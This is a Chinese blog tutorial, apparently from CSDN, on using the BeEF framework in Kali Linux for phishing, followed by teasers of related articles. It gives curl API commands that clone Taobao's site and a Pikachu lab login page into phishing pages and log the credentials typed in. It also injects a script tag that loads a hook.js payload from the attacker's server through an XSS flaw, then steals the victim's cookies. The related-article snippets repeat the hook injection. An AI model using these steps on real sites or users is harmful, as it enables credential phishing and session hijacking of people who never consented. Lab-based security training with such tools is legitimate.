beef-xss钓鱼

最新推荐文章于 2025-01-12 17:57:10 发布
最新推荐文章于 2025-01-12 17:57:10 发布
阅读量814 收藏 8
点赞数 2
分类专栏: 网络安全 文章标签: xss 安全 web安全 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Williamanddog/article/details/128769135
版权

BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多 payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。基于Ruby语言编写,并且支持 图形化界面,操作简单。

如果你的kali中没有beef的话,执行sudo apt install beef-xss进行安装

找到配置文件/usr/share/beef-xss/config.yaml 修改监听地址为本机IP

修改登录密码

启动beef

cd /usr/share/beef-xss

./beef

如果执行报错的话,可以执行以下命令重新安装ruby和beef-xss

#apt remove ruby

#apt remove beef-xss

#apt-get install ruby

#apt-get install ruby-dev libpcap-dev

#gem install eventmachine

#apt-get install beef-xss

启动后,访问 http://192.168.1.142:3000/ui/panel 页面

使用beef克隆网站

curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"<

URL of site to clone >", "mount":"<where to mount>"}' -X POST http://<BeEFURL>/api/seng/clone_page?token=<token>

// <URL of site to clone> 需要克隆的网址

// <where to mount> 克隆的页面在服务器的哪个路径访问

// <token>服务启动时的 beef API key

API key在beef启动处查看

例如:curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"https://www.taobao.com", "mount":"/clone_site_taobao"}' -X POST http://192.168.1.142:3000/api/seng/clone_page?token=0c4b9539e137af63b3e82e4dddc6fe973bc432e8

我们克隆了淘宝的页面,url为http://192.168.1.142:3000/clone_site_taobao

打开页面

浏览器访问beef制作的钓鱼页面后,可以看到有机器上线

接下来克隆 pikachu 平台的”反射型xss(post)“的登录页面 curl -H "Content-Type: application/json; charset=UTF-8" -d '{"url":"http://pikachu_ip/vul/xss/xsspost/post_login.php","mount":"/pikachu_mag edu"}' -X POST http://kali_ip:3000/api/seng/clone_page?token=XXX

访问 http://kali_ip:3000/clone_pikachu ,可以看到beef中有机器上线,在页面中进行登录

根据日志可知,用户名和密码为admin,123456

在Pikachu中上传hook脚本,让用户触发XSS 插入<script src="" target="_blank">http://192.168.1.142:3000/hook.js"></script>

选择 Current Browser -> Commands -> Get Cookie 并点击 Execute 获取 cookie

回到前台查看是否一致

网络安全beef-xss实操以及xss修复方案
你在看屏幕的同时,屏幕也在注视着你
09-07 2378
beef-xss实操
20-5 XSS的利用(包含:蓝莲花、beef-xss
weixin_43263566的博客
01-12 462
存储型XSS是一种特殊类型的XSS攻击。攻击者将带有XSS攻击代码的链接放在网页上的某个位置(例如评论框),当用户访问此链接并执行时,攻击者就能获取用户的敏感信息。由于存储型XSS能够攻击所有访问此页面的用户,因此其危害非常大。之后刷新网页或从其他菜单切换到当前url都会触发攻击,出现弹框。那知道了这个机制后我们就开始收集用户的cookie。
BeEF-XSS攻击
彭淦淦的博客
05-11 1082
6.1 问题 Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击 6.2 步骤 实现此案例需要按照如下步骤进行。 1)Kali虚拟机安装BeEF,依次运行命令apt-get update,apt-get install beef-xss,安装完成后启动beef-xss,用户名beef,自定义密码例如123456,如图-11和图-12所示 图-11 图-1
Beef-xss
dieman0446的博客
12-19 250
Beef xss beef安装目录:/usr/share/beef-xss UI URL:http://IP:3000/ui/panel Hook:<script src="http://IP:3000/hook.js"></script> 默认测试页面:http://IP:3000/demos/butcher/index.html 转载于:h...
xss--钓鱼beef
qq_51802152的博客
10-26 276
kali---beef 牛肉的使用
初探BeEF
weixin_30258901的博客
01-23 340
1.什么是BeEF? 就是The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。 里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。 大概长这个样子(默认用户名密码是beefbeef): 2.安装beef和使用beef BT5...
beef结合msf钓鱼
weixin_34174132的博客
03-17 713
Kali linux 系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...
WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOM&BEEF-XSS
最新发布
weixin_45534587的博客
01-12 1292
XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。
XSS跨站脚本攻击理论和实战 XSS构造脚本+手动XSS+利用BEef自动化XSS网络安全学习13)
Until_U的博客
07-06 6211
CONTENTS 1 XSS简介 2 构造XSS脚本 2.1 常用的HTML标签 2.2 常用java script方法 2.3 构造XSS脚本 3 反射型XSS 4 存储型XSS 5 kali渗透获取cookie 6 自动化XSS 6.1 BEef简介 6.2 BEef的主要功能 6.3 BEef实战 1 XSS简介 (1)XSS相关概念 跨站脚本( cross site script )为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现...
XSS自动化工具——Beef
世间繁华梦一出
03-10 5840
Beef的使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef的使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
beef-xss
一纸荒芜的博客
09-07 1426
xss漏洞可以拿来做什么呢?只是弹窗吗?不,我们的目的是盗取用户cookie,配合工具还可查看文件管理,本期主要介绍了beef-xss的简单用法。
Kali之Beef利用Xss进行钓鱼
My灬Futrue的博客
07-07 2008
1、操作准备 攻击机:Kali(ip地址:192.168.1.107) 受害者:Windows7 x64(ip地址:192.168.1.163) 2、配置Beef 进入beef的配置文件里 root@kali:~# vim /etc/beef-xss/config.yaml 在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改 注:(默认beef用户名和密码位User:beef,Password:beef) 3、启动Beef root@kali:~# beef-xss
kali linux小白学习(beef网络钓鱼攻击)
Build20的博客
06-01 418
之后,执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令,执行ls命令可看出生成了一个攻击文件jquery.js,该文件包含xss攻击代码<script src=打开var/www/html文件并查看里面的文件(linux目录下有个目录:/回到kali机,可以看到上钩了,我可以查看他的cookie了。之后进入靶机,把kali机的ip地址输入,可以看到上钩了。1.解析网页语言,如html,php,jsp等。
BeEf:利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2827
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。 apt install beef-xss 安装完成后,直接
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 6419
xss-工具-Beef-Xss安装以及使用
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
wangluoanquan111的博客
08-20 1416
✅作者简介:优快云内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
渗透利器-kali工具 (第三章-6) Xss漏洞学习之-Beef-Xss
ztc131450的博客
11-11 801
注入攻击的本质,是把用户输入的数据当做代码执行。条件:用户能够控制值输入原本要执行的代码,拼接了用户输入的数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值